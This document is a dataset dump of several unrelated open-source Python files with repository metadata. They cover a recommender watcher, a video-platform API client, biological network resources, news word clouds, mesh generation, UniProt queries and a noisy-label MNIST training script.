':recommended-reserve', 0, str(f['_id']))\n \n # If any of the activity type match user's interests recommend as high\n if 'interests' in user and f.get('activityType', []) != []:\n for a in f['activityType']:\n if a in user['interests']:\n r.lpush(REDIS_PREFIX + str(user['_id']) + ':recommended-high', str(f['_id']))\n h = True\n break\n \n if h == False:\n r.lpush(REDIS_PREFIX + str(user['_id']) + ':recommended-medium', str(f['_id']))\n \n\n except Exception as ex:\n # TODO: log the execption\n print(ex)\n\n\nwith concurrent.futures.ProcessPoolExecutor() as executor:\n executor.submit(watchInsertVibes)\n executor.submit(watchDeleteVibes)\n executor.submit(watchInsertUsers)\n executor.submit(watchInsertUseredges)","repo_name":"ahun-et/ahun-recommender","sub_path":"watch.py","file_name":"watch.py","file_ext":"py","file_size_in_byte":10291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26595608651","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import absolute_import\n\nimport time\nimport random\nimport hashlib\n\nimport requests\n\nfrom . import PY3, __version__\nfrom .resource import Resource\n\nfrom requests.adapters import HTTPAdapter\nfrom requests.packages.urllib3.util.retry import Retry\n\n\nBACKOFF_FACTOR = 1.7\nRETRY_COUNT = 5\n\n\nclass RetryAdapter(HTTPAdapter):\n \"\"\"Exponential backoff http adapter.\n \"\"\"\n def __init__(self, *args, **kwargs):\n super(RetryAdapter, self).__init__(*args, **kwargs)\n self.max_retries = Retry(total=RETRY_COUNT,\n backoff_factor=BACKOFF_FACTOR)\n\n\nif PY3:\n from urllib.parse import quote\n unicode = lambda s: str(s)\nelse:\n from urllib import quote\n\n\nclass Client(object):\n \"\"\"JW Platform API client.\n\n An API client for the JW Platform. For the API documentation see:\n https://developer.jwplayer.com/jw-platform/reference/v1/index.html\n\n Args:\n key (str): API User key\n secret (str): API User secret\n scheme (str, optional): Connection scheme: 'http' or 'https'.\n Default is 'http'.\n host (str, optional): API server host name.\n Default is 'api.jwplatform.com'.\n port (int, optional): API server port. Default is 80.\n version (str, optional): Version of the API to use.\n Default is 'v1'.\n agent (str, optional): API client agent identification string.\n\n Examples:\n >>> jwplatform_client = jwplatform.Client('API_KEY', 'API_SECRET')\n \"\"\"\n\n def __init__(self, key, secret, *args, **kwargs):\n self.__key = key\n self.__secret = secret\n\n self._scheme = kwargs.get('scheme') or 'https'\n self._host = kwargs.get('host') or 'api.jwplatform.com'\n self._port = int(kwargs['port']) if kwargs.get('port') else 80\n self._api_version = kwargs.get('version') or 'v1'\n self._agent = kwargs.get('agent')\n\n self._connection = requests.Session()\n self._connection.mount(self._scheme, RetryAdapter())\n\n self._connection.headers['User-Agent'] = 'python-jwplatform/{}{}'.format(\n __version__, '-{}'.format(self._agent) if self._agent else '')\n\n def __getattr__(self, resource_name):\n return Resource(resource_name, self)\n\n def _build_request(self, path, params=None):\n \"\"\"Build API request\"\"\"\n\n _url = '{scheme}://{host}{port}/{version}{path}'.format(\n scheme=self._scheme,\n host=self._host,\n port=':{}'.format(self._port) if self._port != 80 else '',\n version=self._api_version,\n path=path)\n\n if params is not None:\n _params = params.copy()\n else:\n _params = dict()\n\n # Add required API parameters\n _params['api_nonce'] = str(random.randint(0, 999999999)).zfill(9)\n _params['api_timestamp'] = int(time.time())\n _params['api_key'] = self.__key\n _params['api_format'] = 'json'\n _params['api_kit'] = 'py-{}{}'.format(\n __version__, '-{}'.format(self._agent) if self._agent else '')\n\n # Construct Signature Base String\n sbs = '&'.join(['{}={}'.format(\n quote((unicode(key).encode('utf-8')), safe='~'),\n quote((unicode(value).encode('utf-8')), safe='~')\n ) for key, value in sorted(_params.items())])\n\n # Add signature to the _params dict\n _params['api_signature'] = hashlib.sha1(\n '{}{}'.format(sbs, self.__secret).encode('utf-8')).hexdigest()\n\n return _url, _params\n","repo_name":"jwplayermurphy/S3-Lambda-Watchfolder","sub_path":"jwplatform/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":3625,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"70278622509","text":"from future.utils import iteritems\n\nimport copy\n\nimport pypath.internals.resource as resource\nimport pypath.resources.data_formats as data_formats\nimport pypath.share.session as session_mod\nimport pypath.share.settings as settings\n\n_logger = session_mod.Logger(name = 'network_resources')\n_log = _logger._log\n\n_data_models = {\n 'interaction': 'interaction',\n 'interaction_misc': 'interaction',\n 'interaction_htp': 'interaction',\n 'ligand_receptor': 'ligand_receptor',\n 'ligrecextra': 'ligand_receptor',\n 'pathway': 'activity_flow',\n 'pathway_all': 'activity_flow',\n 'pathway_noref': 'activity_flow',\n 'pathwaycommons': 'activity_flow',\n 'activity_flow': 'activity_flow',\n 'pathwayextra': 'activity_flow',\n 'dorothea': 'activity_flow',\n 'collectri': 'activity_flow',\n 'tf_target': 'activity_flow',\n 'transcription': 'activity_flow',\n 'transcription_dorothea': 'activity_flow',\n 'transcription_collectri': 'activity_flow',\n 'transcription_onebyone': 'activity_flow',\n 'pathwaycommons_transcription': 'activity_flow',\n 'tfregulons': 'activity_flow',\n 'mirna_target': 'activity_flow',\n 'lncrna_target': 'activity_flow',\n 'tf_mirna': 'activity_flow',\n 'enzyme_substrate': 'enzyme_substrate',\n 'ptm': 'enzyme_substrate',\n 'ptm_all': 'enzyme_substrate',\n 'ptm_misc': 'enzyme_substrate',\n 'ptm_noref': 'enzyme_substrate',\n 'kinaseextra': 'enzyme_substrate',\n 'reaction': 'process_description',\n 'reaction_misc': 'process_description',\n 'reaction_pc': 'process_description',\n}\n\n\nDATASET_PRIORITIES = {\n 'omnipath': 0,\n 'directionextra': 100,\n}\n\n\n\ndef dataset_priority(dataset: str, default: int = 50) -> int:\n\n return DATASET_PRIORITIES.get(dataset, default)\n\n\ndef choose_dataset(dataset_a: str, dataset_b: str) -> str:\n\n priority_a = dataset_priority(dataset_a)\n priority_b = dataset_priority(dataset_b)\n\n return dataset_a if priority_a < priority_b else dataset_b\n\n\ndef _networkinput_to_networkresource(networkinput, data_model = None):\n\n return resource.NetworkResource(\n name = networkinput.name,\n interaction_type = networkinput.interaction_type,\n networkinput = networkinput,\n data_model = data_model,\n )\n\n\ndef dorothea_expand_levels(resources = None, levels = None):\n \"\"\"\n In a dictionary of resource definitions creates a separate\n ``NetworkResource`` object for each confidence levels of DoRothEA\n just like each level was a different resource.\n\n No matter ``resources`` is a ``NetworkResource`` or a dict of network\n resources, returns always a dict of network resources.\n \"\"\"\n\n resources = resources or transcription\n levels = levels or settings.get('tfregulons_levels')\n dorothea = {}\n\n dorothea_original = (\n resources\n if hasattr(resources, 'networkinput') else\n resources['dorothea']\n if 'dorothea' in resources else\n transcription['dorothea']\n )\n\n for level in levels:\n\n level_key = 'dorothea_%s' % level\n\n dorothea[level_key] = copy.deepcopy(dorothea_original)\n dorothea[level_key].name = 'DoRothEA_%s' % level\n dorothea[level_key].networkinput.name = 'DoRothEA_%s' % level\n dorothea[level_key].networkinput.input_args = {'levels': {level}}\n\n if resources:\n\n resources = copy.deepcopy(resources)\n _ = resources.pop('dorothea', None)\n resources.update(dorothea)\n\n return resources\n\n else:\n\n return dorothea\n\n\nfor dataset_label in dir(data_formats):\n\n dataset = getattr(data_formats, dataset_label)\n\n if not isinstance(dataset, dict):\n\n continue\n\n new_dataset = resource.NetworkDataset(name = dataset_label)\n\n for resource_label, input_def in iteritems(dataset):\n\n if not isinstance(input_def, data_formats.input_formats.NetworkInput):\n\n continue\n\n data_model = (\n input_def.data_model or\n (\n _data_models[dataset_label]\n if dataset_label in _data_models else\n 'unknown'\n )\n )\n\n if (\n data_model == 'unknown' and\n dataset_label not in {'omnipath', 'extra_directions'}\n ):\n\n _log(\n 'Could not find data model for '\n 'resource `%s` in set `%s`.' % (\n input_def.name,\n dataset_label,\n )\n )\n\n new_dataset[resource_label] = _networkinput_to_networkresource(\n networkinput = input_def,\n data_model = data_model,\n )\n\n if new_dataset:\n\n globals()[dataset_label] = new_dataset\n\n\n# these we need to re-create to have the data models set correctly\nextra_directions = copy.deepcopy(ptm_misc)\nextra_directions.update(copy.deepcopy(pathway_noref))\nextra_directions['acsn'] = copy.deepcopy(reaction_pc['acsn'])\nextra_directions['acsn'].data_model = 'activity_flow'\nomnipath = resource.NetworkDataset(name = 'omnipath')\nomnipath.update(pathway)\nomnipath.update(ptm)\nomnipath.update(interaction)\nomnipath['hprd'] = interaction_htp['hprd']\n","repo_name":"saezlab/pypath","sub_path":"pypath/resources/network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":5154,"program_lang":"python","lang":"en","doc_type":"code","stars":114,"dataset":"github-code","pt":"37"} +{"seq_id":"29517801288","text":"# A program that:\n#\t- Reads text from the files in foxnews and nytimes subdirectories;\n#\t- Creates two separate wordclouds from the text overlayed over the democrat.png and republican.png stencils respectively;\n#\t- Creates a third wordcloud using the combined texts with the unicorn.png stencil;\n#\t- Saves the resulting images to the root directory as foximage.png, timesimage.png, and unicornimage.png;\n#\t- Saves the same images to imagearchive subdirectory with today's date prepended to filenames.\n#\n# Relies on the word cloud software package found at: https://github.com/amueller/word_cloud\n\nimport os\nfrom PIL import Image, ImageColor\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport glob\nfrom wordcloud import WordCloud, STOPWORDS, get_single_color_func\nfrom datetime import date\nfrom os import path\nimport colorsys\n\nfrom random import Random\n\ndays = 10 # number of days headlines you want to use, contingent on the date existing in the relevant directory.\ntoday = date.today().isoformat()\n\n# Read the text from the specified number of foxnews subdirectory files into \"foxtext\" string.\nfoxtext = \"\"\nlist_of_fox_files = glob.glob('foxnews/*')\nfor _ in range(days):\n if list_of_fox_files:\n latest_fox_file = max(list_of_fox_files, key=os.path.getmtime)\n foxtext += open(latest_fox_file).read()\n list_of_fox_files.remove(latest_fox_file)\n\n# Read the text from the specified number of nytimes subdirectory files into \"nytimestext\" string.\t\t\nnytimestext = \"\"\nlist_of_nytimes_files = glob.glob('nytimes/*')\nfor _ in range(days):\n if list_of_nytimes_files:\n latest_nytimes_file = max(list_of_nytimes_files, key=os.path.getmtime)\n nytimestext += open(latest_nytimes_file).read()\n list_of_nytimes_files.remove(latest_nytimes_file)\n\n\t\t\n# Combine text for unicorn image \t\t\nunicorntext = foxtext + \" \" + nytimestext\n# Code that would make unicorn use only words used by BOTH foxnews and times.\n# document_1_words = foxtext.split()\n# document_2_words = nytimestext.split()\n# unique = list(set(document_1_words).symmetric_difference(set(document_2_words)))\n# splitwords = unicorntext.split()\n# resultwords = [word for word in splitwords if word not in unique]\n# unicorntext = ' '.join(resultwords)\n\t\t\n# read the mask image\nd = path.dirname(__file__)\nfoxmask = np.array(Image.open(path.join(d, \"republican.png\")))\ntimesmask = np.array(Image.open(path.join(d, \"democrat.png\")))\nunicornmask = np.array(Image.open(path.join(d, \"unicorn.png\")))\n\n# Set list of words to exclude. Using default with a few additions. \nstopwords = set(STOPWORDS)\nstopwords.add(\"said\")\nstopwords.add(\"say\")\nstopwords.add(\"says\")\n\n# Define color functions to feed into wordcloud recolor function\ndef red_color_func(word, font_size, position, orientation, random_state=None,\n **kwargs):\n return 'rgb({:.0f}, {:.0f}, {:.0f})'.format(255, 0, 0)\ndef blue_color_func(word, font_size, position, orientation, random_state=None,\n **kwargs):\n return 'rgb({:.0f}, {:.0f}, {:.0f})'.format(0, 0, 255)\ndef get_shaded_color_func(color):\n \"\"\"Create a color function which returns a single and value, but with varying saturation with. \n\tAccepted values are color strings as usable by PIL/Pillow.\n \"\"\"\n old_r, old_g, old_b = ImageColor.getrgb(color)\n rgb_max = 255.\n h, s, v = colorsys.rgb_to_hsv(old_r / rgb_max, old_g / rgb_max,\n old_b / rgb_max)\n\n def single_color_func(word=None, font_size=None, position=None,\n orientation=None, font_path=None, random_state=None):\n \"\"\"Random color generation.\n\n Additional coloring method. It picks a random saturation with hue and\n value based on the color given to the generating function.\n \"\"\"\n if random_state is None:\n random_state = Random()\n r, g, b = colorsys.hsv_to_rgb(h, random_state.uniform(.5, 1), v)\n return 'rgb({:.0f}, {:.0f}, {:.0f})'.format(r * rgb_max, g * rgb_max,\n b * rgb_max)\n return single_color_func \n \n# generate foxnews word cloud\nfoxwc = WordCloud(background_color=\"black\", max_words=150, mask=foxmask,\n stopwords=stopwords)\nfoxwc.generate(foxtext)\n# Apply our color function \nfoxwc.recolor(color_func=get_shaded_color_func(\"red\"))\n# store to files\nfoxwc.to_file(path.join(d, \"foximage.png\"))\nfoxwc.to_file(path.join(d, \"imagearchive/\" + today + \" foximage.png\"))\n\n# generate nytimes word cloud\ntimeswc = WordCloud(background_color=\"black\", max_words=150, mask=timesmask,\n stopwords=stopwords)\ntimeswc.generate(nytimestext)\n# Apply our color function\ntimeswc.recolor(color_func=get_shaded_color_func(\"blue\"))\n# store to files\ntimeswc.to_file(path.join(d, \"timesimage.png\"))\ntimeswc.to_file(path.join(d, \"imagearchive/\" + today + \" timesimage.png\"))\n\n# generate combined word cloud\nunicornwc = WordCloud(background_color=\"black\", max_words=150, mask=unicornmask,\n stopwords=stopwords)\nunicornwc.generate(unicorntext)\n# Apply our color function \nunicornwc.recolor(color_func=get_shaded_color_func(\"pink\"))\n# store to files\nunicornwc.to_file(path.join(d, \"unicornimage.png\"))\nunicornwc.to_file(path.join(d, \"imagearchive/\" + today + \" unicornimage.png\"))","repo_name":"PeterTsapatsaris/Red-State-Blue-State","sub_path":"makecloud.py","file_name":"makecloud.py","file_ext":"py","file_size_in_byte":5307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40707316204","text":"import numpy as np\n\nfrom mpl_toolkits.mplot3d import Axes3D\nimport matplotlib.pyplot as plt\nfrom fealpy.mesh import TriangleMesh\nfrom fealpy.mesh.implicit_surface import Sphere\nfrom fealpy.mesh.implicit_curve import Circle\n\nc = np.zeros(3)\npi = np.pi\nrc = 15\nalpha = pi*40/180\n\nr = rc/np.sin(alpha)\nh = r*np.cos(alpha)\n\nnode = np.zeros((7, 3), dtype=np.float)\ntheta = np.linspace(0, 2*pi, num=6, endpoint=False)\n\nnode[0, :] = [0, 0, r]\nnode[1:, 0] = 15*np.cos(theta)\nnode[1:, 1] = 15*np.sin(theta)\nnode[1:, 2] = h\n\ncell = np.array([\n (0, 1, 2), (0, 2, 3), (0, 3, 4), \n (0, 4, 5), (0, 5, 6), (0, 6, 1)\n ], dtype=np.int32)\n\nsurface = Sphere(c, r)\ncircle = Circle(radius=rc)\n\nmesh = TriangleMesh(node, cell)\nfor i in range(8):\n mesh.uniform_refine() \n isBdNode = mesh.ds.boundary_node_flag()\n r0 = np.sqrt(np.sum(mesh.node[isBdNode, 0:2]**2, axis=1))\n mesh.node[isBdNode, 0:2] *=rc/r0.reshape(-1, 1)\n\nmesh.node, _ = surface.project(mesh.node)\n\nmesh0 = TriangleMesh(mesh.node.copy(), mesh.ds.cell.copy())\nmesh0.node *=(r+0.03)/r\n\nmesh1 = TriangleMesh(mesh.node.copy(), mesh.ds.cell.copy())\nmesh1.node *=(r-0.03)/r\n\nfig = plt.figure()\naxes = fig.add_subplot(111, projection='3d')\n#mesh.add_plot(axes)\nmesh0.add_plot(axes)\nmesh1.add_plot(axes)\nplt.show()\n\n","repo_name":"weihuayi/fealpy","sub_path":"app/mego/shellmesh.py","file_name":"shellmesh.py","file_ext":"py","file_size_in_byte":1271,"program_lang":"python","lang":"en","doc_type":"code","stars":209,"dataset":"github-code","pt":"37"} +{"seq_id":"16634748377","text":"import urllib,urllib2\nimport re\n\noutput = open(\"query_reviewed.txt\", \"w+\") #Define output file. In this file, ALL the information of ALL rewieved genes of UniProt Database will be stored\n\n\n\n###############\n\n\nurl = \"https://www.uniprot.org/uniprot/?query=reviewed:yes+AND+organism:9606&format=tab\"\n\nrequest = urllib2.Request(url)\nresponse = urllib2.urlopen(request)\npage = response.read()\n\nprint(page)\noutput.write(page)\n\t\n\ninputlines = [line.rstrip('\\n') for line in open(\"query_reviewed.txt\", \"r\")] #This input file is the former output file\n\ntrusightlines = [line.rstrip('\\n') for line in open(\"trusight_expanded_text.txt\")] #Open the file containing the list of genes for which we want to retreive information from UniProt database\n\n\n\n#Define new output file. Here, only the information of the custom genes will be stored\noutputfile= open(\"query_reviewed_filtered_txt\",\"w+\")\n\n\nfor protein in trusightlines:\n\tprot = protein\n\tfor line in inputlines:\n\t\tif re.search(r'\\b' + prot + r'\\b', line): #Using re, I can get exact matches \n\t\t\n\t\t\tprint >> outputfile, protein, line\n","repo_name":"maxxim333/API_UniProt","sub_path":"uniprotapi_method_two.py","file_name":"uniprotapi_method_two.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33790944295","text":"BRATS = \"BRATS\"\nHGG = \"HGG\"\nLGG = \"LGG\"\nBRATS_SLICE = 'BRATS-SLICE'\n\nSEQUENCE_FLR = 'flr'\nSEQUENCE_PDW = 'pdw'\nSEQUENCE_T1C = 't1c'\nSEQUENCE_T1P = 't1p'\nSEQUENCE_T2W = 't2w'\nSEQUENCES = (SEQUENCE_FLR, SEQUENCE_T1C, SEQUENCE_T1P, SEQUENCE_T2W, SEQUENCE_PDW)\n\nSEQUENCE_FLAIR = 'flair'\nSEQUENCE_T1CE = 't1ce'\nSEQUENCE_T1 = 't1'\nSEQUENCE_T2 = 't2'\nBRATS_SEQUENCES = (SEQUENCE_FLAIR, SEQUENCE_T1CE, SEQUENCE_T1, SEQUENCE_T2)\n\nEXTENSION_MNC = '.mnc'\nEXTENSION_MNC_GZ = '.mnc.gz'\nEXTENSION_NII_GZ = '.nii.gz'\nEXTENSIONS_NIB = (EXTENSION_MNC, EXTENSION_MNC_GZ, EXTENSION_NII_GZ)\n\nEXTENSION_NPY = '.npy'\nEXTENSION_NPZ = '.npz'\nEXTENSIONS = (EXTENSION_MNC, EXTENSION_MNC_GZ, EXTENSION_NII_GZ, EXTENSION_NPY, EXTENSION_NPZ)\n\nLABEL_SEG = 'seg'\nBRATS_LABELS = (LABEL_SEG,)\n\nSUFFIX_BRATS = '.nii.gz'\n\nMASK = 'mask'\nconst_MASK = \"MASK\"\nconst_SEG = \"SEG\"\nconst_MODS = \"MODS\"\nconst_PRE_GAD_MODS = \"PRE_GAD_MODS\"\nconst_POST_GAD_MODS = \"POST_GAD_MODS\"","repo_name":"SaverioVad/HAD_Net","sub_path":"utils/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"37"} +{"seq_id":"27138044461","text":"#!/usr/bin/env python\n\nimport sys\nfrom math import floor, pi\nimport numpy as np\nimport pairlist as pl\nimport gromacs\n\n\ndef main():\n atoms, cell = gromacs.load(sys.stdin)\n os = atoms['O']\n assert len(cell) == 3 # assume rect cell.\n # pairlistはnumpy arrayのみ受け入れる。\n os = np.array(os)\n cell = np.array(cell)\n # セルの形状を表現する対角行列\n cellmat = np.diag(cell)\n # 相対位置に換算する(直方体なので簡単)\n rpos = os / cell\n density = os.shape[0] / np.product(cell)\n\n # histogram\n intv = 0.003\n maxbin = 300 # int(min(min(cell[0],cell[1]),cell[2])/2 / intv)\n\n histo = [0.0 for i in range(maxbin)]\n\n # 対とその距離を計算し、ヒストグラムにする。\n # (Pure pythonの場合)\n for i, j, r in pl.pairs_iter(\n rpos, intv * maxbin, cellmat, distance=True, engine=(pl.pairs_py, None)):\n # accumulate\n ir = int(r / intv)\n if ir < maxbin:\n histo[ir] += 1\n\n for ir, h in enumerate(histo):\n r = ir * intv\n # volume of the onion shell\n dv = ((r + intv)**3 - r**3) * 4. * pi / 3.\n # average number of particles in the shell\n dn = dv * density\n print(r, h / dn / len(os) * 2)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"vitroid/PairList","sub_path":"samples/RDF_pairlist.py","file_name":"RDF_pairlist.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"ja","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"33405018000","text":"# -*- coding: UTF-8 -*-\n\nfrom __future__ import print_function\nimport sys\nreload(sys)\nsys.setdefaultencoding('utf-8')\n\nimport os\nimport argparse\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.backends.cudnn as cudnn\nimport torch.optim as optim\nfrom torchvision import datasets, transforms\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport time\nimport copy\nimport parse\nimport utility as utility\n# from models import *\n\n\nclass Net(torch.nn.Module):\n def __init__(self):\n super(Net, self).__init__()\n self.conv = torch.nn.Sequential(\n torch.nn.Conv2d(1, 16, 5, 1, padding=2,bias=False),\n torch.nn.BatchNorm2d(16),\n torch.nn.ReLU(inplace=True),\n torch.nn.MaxPool2d(2),\n torch.nn.Conv2d(16, 32, 5, 1, padding=2,bias=False),\n torch.nn.BatchNorm2d(32),\n torch.nn.ReLU(inplace=True),\n torch.nn.MaxPool2d(2))\n\n\n self.dense = torch.nn.Sequential(\n torch.nn.Linear(32 * 7 * 7, 100),\n torch.nn.BatchNorm1d(100),\n torch.nn.ReLU(inplace=True),\n torch.nn.Linear(100, 100),\n torch.nn.BatchNorm1d(100),\n torch.nn.ReLU(inplace=True),\n torch.nn.Linear(100, 100),\n torch.nn.BatchNorm1d(100),\n torch.nn.ReLU(inplace=True),\n torch.nn.Linear(100, 10)\n )\n\n def forward(self, x):\n conv_out = self.conv(x)\n res = conv_out.view(conv_out.size(0), -1)\n out = self.dense(res)\n return out\n\nclass Net2(torch.nn.Module):\n def __init__(self):\n super(Net2, self).__init__()\n self.conv1 = nn.Conv2d(1, 16, 5, 1, padding=2, bias=False)\n self.bn2d1 = nn.BatchNorm2d(16)\n self.conv2 = nn.Conv2d(16, 32, 5, 1, padding=2, bias=False)\n self.bn2d2 = nn.BatchNorm2d(32)\n self.dense1 = nn.Linear(32 * 7 * 7, 100)\n self.bn1d1 = nn.BatchNorm1d(100)\n self.dense2 = nn.Linear(100, 100)\n self.bn1d2 = nn.BatchNorm1d(100)\n self.dense3 = nn.Linear(100, 100)\n self.bn1d3 = nn.BatchNorm1d(100)\n self.dense4 = nn.Linear(100, 10)\n\n\n def forward(self, x):\n conv1 = F.max_pool2d(F.relu(self.bn2d1(self.conv1(x))), 2)\n conv2 = F.max_pool2d(F.relu(self.bn2d2(self.conv2(conv1))), 2)\n res = conv2.view(conv2.size(0), -1)\n des1 = F.relu(self.bn1d1(self.dense1(res)))\n des2 = F.relu(self.bn1d2(self.dense2(des1)))\n des3 = F.relu(self.bn1d3(self.dense3(des2)))\n out = self.dense4(des3)\n return out\n\n\n\ndef train(args, model, device, trainset, optimizer, kwargs):\n model.train()\n criterion = nn.CrossEntropyLoss()\n train_loader = torch.utils.data.DataLoader(trainset, batch_size=args.batch_size, shuffle=True, drop_last=True, num_workers=3)\n\n correct = 0\n for batch_idx, (data, target) in enumerate(train_loader):\n data, target = data.to(device), target.to(device)\n optimizer.zero_grad()\n output = model(data)\n loss = criterion(output, target)\n pred = output.max(1, keepdim=True)[1] # get the index of the max log-probability\n correct += pred.eq(target.view_as(pred)).sum().item()\n loss.backward()\n optimizer.step()\n\n avg_accur = 1. * correct / len(train_loader.dataset)\n return loss.data.cpu(), avg_accur\n\n\ndef test(args, model, device, testset, kwargs):\n model.eval()\n criterion = nn.CrossEntropyLoss()\n test_loader = torch.utils.data.DataLoader(testset, batch_size=args.test_batch_size,\n shuffle=False, drop_last=False, num_workers=3)\n\n test_loss = 0\n correct = 0\n label_hat = torch.LongTensor().to(device)\n with torch.no_grad():\n for data, target in test_loader:\n data, target = data.to(device), target.to(device)\n output = model(data)\n test_loss += criterion(output, target).item() # sum up batch loss\n pred = output.max(1, keepdim=True)[1] # get the index of the max log-probability\n label_hat = torch.cat([label_hat, pred], 0)\n correct += pred.eq(target.view_as(pred)).sum().item()\n\n\n test_loss /= len(test_loader.dataset)\n correct = float(correct)\n accur_rate = correct / len(test_loader.dataset)\n return accur_rate, label_hat.cpu().view(-1), test_loss\n\ndef weights_init(m):\n if isinstance(m, nn.Conv2d):\n # n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n # m.weight.data.normal_(0, math.sqrt(2. / n))\n size = m.weight.size()\n fan_out = size[0] # number of rows\n fan_in = size[1] # number of columns\n m.weight.data.normal_(0.0, np.sqrt(2.0 / (fan_in + fan_out)))\n elif isinstance(m, nn.Linear):\n size = m.weight.size()\n fan_out = size[0] # number of rows\n fan_in = size[1] # number of columns\n m.weight.data.normal_(0.0, np.sqrt(2.0 / (fan_in + fan_out)))\n m.bias.data.zero_()\n elif isinstance(m, nn.BatchNorm2d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n elif isinstance(m, nn.BatchNorm1d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n\n\n\ndef main():\n # Training settings\n parser = parse.define_parser()\n args = parser.parse_args()\n print(args)\n use_cuda = not args.no_cuda and torch.cuda.is_available()\n device = torch.device(\"cuda\" if use_cuda else \"cpu\")\n kwargs = {'num_workers': 3, 'pin_memory': True} if use_cuda else {}\n\n print('==> Loading data set..')\n trainset = datasets.MNIST('../data', train=True, download=True,\n transform=transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.1307,), (0.3081,))\n ]))\n testset = datasets.MNIST('../data', train=False, transform=transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.1307,), (0.3081,))\n ]))\n\n # polluting trainset\n trainset_noisy = utility.polluting_dataset(trainset, args)\n\n obs_pred_accur = np.zeros(args.retrain_times)\n LoR_sel = np.zeros(args.retrain_times)\n test_acurr_selected = np.zeros(args.retrain_times)\n\n old_LoR_sel = 0\n\n plt.ion()\n\n for i in range(args.retrain_times):\n model = Net().to(device)\n\n # man-made reverse samples via label-shifting operation\n dataset_with_pure_error, reverse_set, leftover_set = \\\n utility.prepare_reverse_samples_for_dataset(trainset_noisy, testset, args.beta, args.mix_samp)\n\n optimizer = optim.SGD(model.parameters(), lr=args.lr, momentum=args.momentum)\n\n loss_rec = np.zeros(args.epoch_num_sel)\n avg_train_accur = np.zeros(args.epoch_num_sel)\n reverse_acurr = np.zeros(args.epoch_num_sel)\n leftover_acurr = np.zeros(args.epoch_num_sel)\n test_acurr = np.zeros(args.epoch_num_sel)\n LoR = np.zeros(args.epoch_num_sel)\n old_LoR = 0\n\n loss_R = np.zeros(args.epoch_num_sel)\n loss_L = np.zeros(args.epoch_num_sel)\n loss_LoR = np.zeros(args.epoch_num_sel)\n loss_test = np.zeros(args.epoch_num_sel)\n\n # LIMITED GRADIENT DESCENT\n for epoch in range(args.epoch_num_sel):\n tic = time.time()\n loss_rec[epoch], avg_train_accur[epoch] = train(args, model, device, dataset_with_pure_error, optimizer, kwargs)\n reverse_acurr[epoch], _, loss_R[epoch] = test(args, model, device, reverse_set, kwargs)\n leftover_acurr[epoch], _, loss_L[epoch] = test(args, model, device, leftover_set, kwargs)\n test_acurr[epoch], _, loss_test[epoch] = test(args, model, device, testset, kwargs)\n LoR[epoch] = leftover_acurr[epoch] / (reverse_acurr[epoch] + 0.00000001)\n\n torch.save({'avg_train_accur': avg_train_accur[0:epoch+1],\n 'reverse_acurr': reverse_acurr[0:epoch+1],\n 'leftover_acurr': leftover_acurr[0:epoch+1],\n 'test_acurr': test_acurr[0:epoch+1]}, 'save_train_curve_once_train.pt')\n\n # output the model according to maximum LoR\n if LoR[epoch] > old_LoR:\n old_LoR = LoR[epoch]\n model_output = copy.deepcopy(model)\n best_epoch_number = epoch\n test_acurr_selected[i] = test_acurr[epoch]\n LoR_sel[i] = LoR[epoch]\n\n toc = time.time()\n\n print('Epoch: {} Loss:{:.4f} train corr rate:{:.4f} test corr rate: {:.4f} pure error corr rate: {:.4f} leftover corr rate: {:.4f} LoR: {:.4f} best_epoch_number: {} time: {:.5f}'.format(\n epoch, loss_rec[epoch], avg_train_accur[epoch], test_acurr[epoch], reverse_acurr[epoch], leftover_acurr[epoch], LoR[epoch], best_epoch_number, toc - tic))\n\n if args.disp_detail == 'True':\n plt.figure(1)\n plt.plot(np.arange(epoch+1), avg_train_accur[0:epoch+1], 'blue',\n np.arange(epoch+1), test_acurr[0:epoch+1], 'red',\n np.arange(epoch + 1), reverse_acurr[0:epoch + 1], 'green',\n np.arange(epoch + 1), leftover_acurr[0:epoch + 1], 'pink'\n )\n plt.title('Accuracies')\n\n plt.figure(2)\n plt.plot(np.arange(epoch+1), LoR[0:epoch+1],'blue')\n plt.title('LoR')\n plt.pause(0.1)\n\n if args.disp_detail == 'True':\n plt.close(1)\n plt.close(2)\n\n # cover trainset type to testset type for using test data DataLoader\n trainset_noisy_for_test = utility.trainset_to_testset(trainset_noisy, testset)\n accur_for_trainset_noisy, pred_labels,_ = test(args, model_output, device, trainset_noisy_for_test, kwargs)\n\n obs_pred_accur[i] = pred_labels.eq(trainset.train_labels).sum().float().div(len(trainset))\n trainset_noisy.train_labels = pred_labels\n\n print('Re-train times: {} LoR sel:{:.4f} trainset prdc accur(only observe):{:.4f} test acurr rate selected:{:.4f}'.format(\n i, LoR_sel[i], obs_pred_accur[i], test_acurr_selected[i]))\n plt.figure(3)\n plt.plot( np.arange(i + 1), LoR_sel[0:i + 1], 'red')\n plt.title('LoR selected')\n plt.grid()\n plt.figure(4)\n plt.plot(np.arange(i + 1), obs_pred_accur[0:i + 1], 'blue',\n np.arange(i + 1), test_acurr_selected[0:i + 1], 'red')\n plt.title('prediction accuracy of trainset and testset')\n plt.grid()\n plt.pause(0.01)\n\n if LoR_sel[i] > old_LoR_sel:\n old_LoR_sel = LoR_sel[i]\n torch.save(model_output, 'mnist_model.pt')\n test_accur_rec = test_acurr_selected[i]\n i_rec = 